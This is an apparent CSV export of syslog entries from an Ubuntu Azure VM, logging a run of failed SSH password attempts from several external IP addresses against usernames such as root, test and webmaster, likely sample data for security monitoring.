+5848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:34,UbuntuDevEnv,2019-06-26 16:31:34,auth,UbuntuDevEnv,info,Invalid user jaewn from 119.59.113.183 port 60516,37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jaewn,119.59.113.1,60516,,
+5849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:34,UbuntuDevEnv,2019-06-26 16:31:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:34,UbuntuDevEnv,2019-06-26 16:31:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:37,UbuntuDevEnv,2019-06-26 16:31:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:37,UbuntuDevEnv,2019-06-26 16:31:36,auth,UbuntuDevEnv,info,Failed password for invalid user jaewn from 119.59.113.183 port 60516 ssh2,37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jaewn,119.59.113.1,60516,,
+5853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:37,UbuntuDevEnv,2019-06-26 16:31:37,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 60516:11: Bye Bye [preauth],37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,60516,,
+5854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:37,UbuntuDevEnv,2019-06-26 16:31:37,auth,UbuntuDevEnv,info,Disconnected from invalid user jaewn 119.59.113.183 port 60516 [preauth],37023,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jaewn,119.59.113.1,60516,,
+5855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:39,UbuntuDevEnv,2019-06-26 16:31:38,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 40510 ssh2,37040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40510,,
+5856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:39,UbuntuDevEnv,2019-06-26 16:31:38,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 40510:11: Normal Shutdown, Thank you for playing [preauth]",37040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40510,,
+5857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:39,UbuntuDevEnv,2019-06-26 16:31:38,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 40510 [preauth],37040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,40510,,
+5858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:41,UbuntuDevEnv,2019-06-26 16:31:41,auth,UbuntuDevEnv,info,Invalid user webmaster from 119.59.113.183 port 60848,37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,119.59.113.1,60848,,
+5859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:41,UbuntuDevEnv,2019-06-26 16:31:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:41,UbuntuDevEnv,2019-06-26 16:31:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:43,UbuntuDevEnv,2019-06-26 16:31:43,auth,UbuntuDevEnv,info,Failed password for invalid user webmaster from 119.59.113.183 port 60848 ssh2,37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,119.59.113.1,60848,,
+5862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:44,UbuntuDevEnv,2019-06-26 16:31:43,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 60848:11: Bye Bye [preauth],37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,60848,,
+5863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:44,UbuntuDevEnv,2019-06-26 16:31:43,auth,UbuntuDevEnv,info,Disconnected from invalid user webmaster 119.59.113.183 port 60848 [preauth],37052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,119.59.113.1,60848,,
+5864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:51,UbuntuDevEnv,2019-06-26 16:31:51,auth,UbuntuDevEnv,info,Invalid user nu from 119.59.113.183 port 32948,37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nu,119.59.113.1,32948,,
+5865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:51,UbuntuDevEnv,2019-06-26 16:31:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:51,UbuntuDevEnv,2019-06-26 16:31:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:53,UbuntuDevEnv,2019-06-26 16:31:53,auth,UbuntuDevEnv,info,Failed password for invalid user nu from 119.59.113.183 port 32948 ssh2,37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nu,119.59.113.1,32948,,
+5868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:54,UbuntuDevEnv,2019-06-26 16:31:53,auth,UbuntuDevEnv,info,Disconnected from invalid user nu 119.59.113.183 port 32948 [preauth],37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nu,119.59.113.1,32948,,
+5869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:54,UbuntuDevEnv,2019-06-26 16:31:53,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 32948:11: Bye Bye [preauth],37083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,32948,,
+5870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:58,UbuntuDevEnv,2019-06-26 16:31:57,auth,UbuntuDevEnv,info,Invalid user myftp from 119.59.113.183 port 33282,37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myftp,119.59.113.1,33282,,
+5871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:58,UbuntuDevEnv,2019-06-26 16:31:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:58,UbuntuDevEnv,2019-06-26 16:31:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:59,UbuntuDevEnv,2019-06-26 16:31:59,auth,UbuntuDevEnv,info,Failed password for invalid user myftp from 119.59.113.183 port 33282 ssh2,37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myftp,119.59.113.1,33282,,
+5874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:00,UbuntuDevEnv,2019-06-26 16:31:59,auth,UbuntuDevEnv,info,Disconnected from invalid user myftp 119.59.113.183 port 33282 [preauth],37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,myftp,119.59.113.1,33282,,
+5875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:00,UbuntuDevEnv,2019-06-26 16:31:59,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 33282:11: Bye Bye [preauth],37113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,33282,,
+5876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:11,UbuntuDevEnv,2019-06-26 16:32:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:13,UbuntuDevEnv,2019-06-26 16:32:12,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 43822 ssh2,37165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43822,,
+5878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:13,UbuntuDevEnv,2019-06-26 16:32:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 43822 [preauth],37165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,43822,,
+5879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:13,UbuntuDevEnv,2019-06-26 16:32:12,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 43822:11: Normal Shutdown, Thank you for playing [preauth]",37165,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43822,,
+5880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:33,UbuntuDevEnv,2019-06-26 16:32:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18  user=test,37248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,81.0.212.1,,0,
+5881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:35,UbuntuDevEnv,2019-06-26 16:32:34,auth,UbuntuDevEnv,info,Failed password for test from 81.0.212.18 port 60302 ssh2,37248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,60302,,
+5882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:35,UbuntuDevEnv,2019-06-26 16:32:34,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 60302:11: Bye Bye [preauth],37248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,60302,,
+5883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:35,UbuntuDevEnv,2019-06-26 16:32:34,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 81.0.212.18 port 60302 [preauth],37248,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,81.0.212.1,60302,,
+5884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:43,UbuntuDevEnv,2019-06-26 16:32:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:45,UbuntuDevEnv,2019-06-26 16:32:45,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 47088 ssh2,37283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47088,,
+5886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:46,UbuntuDevEnv,2019-06-26 16:32:45,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 47088 [preauth],37283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,47088,,
+5887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:46,UbuntuDevEnv,2019-06-26 16:32:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 47088:11: Normal Shutdown, Thank you for playing [preauth]",37283,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47088,,
+5888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:58,UbuntuDevEnv,2019-06-26 16:32:57,auth,UbuntuDevEnv,info,Invalid user openhab from 171.8.199.77 port 54062,37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openhab,171.8.199.7,54062,,
+5889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:58,UbuntuDevEnv,2019-06-26 16:32:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+5890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:32:58,UbuntuDevEnv,2019-06-26 16:32:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:00,UbuntuDevEnv,2019-06-26 16:32:59,auth,UbuntuDevEnv,info,Failed password for invalid user openhab from 171.8.199.77 port 54062 ssh2,37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openhab,171.8.199.7,54062,,
+5892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:01,UbuntuDevEnv,2019-06-26 16:33:00,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 54062:11: Bye Bye [preauth],37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,54062,,
+5893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:01,UbuntuDevEnv,2019-06-26 16:33:00,auth,UbuntuDevEnv,info,Disconnected from invalid user openhab 171.8.199.77 port 54062 [preauth],37324,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openhab,171.8.199.7,54062,,
+5894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:04,UbuntuDevEnv,2019-06-26 16:33:04,auth,UbuntuDevEnv,info,Invalid user nz from 66.70.130.155 port 49452,37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nz,66.70.130.1,49452,,
+5895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:04,UbuntuDevEnv,2019-06-26 16:33:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:04,UbuntuDevEnv,2019-06-26 16:33:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:06,UbuntuDevEnv,2019-06-26 16:33:06,auth,UbuntuDevEnv,info,Failed password for invalid user nz from 66.70.130.155 port 49452 ssh2,37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nz,66.70.130.1,49452,,
+5898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:06,UbuntuDevEnv,2019-06-26 16:33:06,auth,UbuntuDevEnv,info,Disconnected from invalid user nz 66.70.130.155 port 49452 [preauth],37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nz,66.70.130.1,49452,,
+5899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:06,UbuntuDevEnv,2019-06-26 16:33:06,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 49452:11: Bye Bye [preauth],37351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,49452,,
+5900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:16,UbuntuDevEnv,2019-06-26 16:33:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:18,UbuntuDevEnv,2019-06-26 16:33:17,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 50382 ssh2,37398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50382,,
+5902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:18,UbuntuDevEnv,2019-06-26 16:33:18,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50382:11: Normal Shutdown, Thank you for playing [preauth]",37398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50382,,
+5903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:18,UbuntuDevEnv,2019-06-26 16:33:18,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 50382 [preauth],37398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,50382,,
+5904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:48,UbuntuDevEnv,2019-06-26 16:33:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:50,UbuntuDevEnv,2019-06-26 16:33:49,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 53678 ssh2,37513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53678,,
+5906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:50,UbuntuDevEnv,2019-06-26 16:33:49,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 53678 [preauth],37513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,53678,,
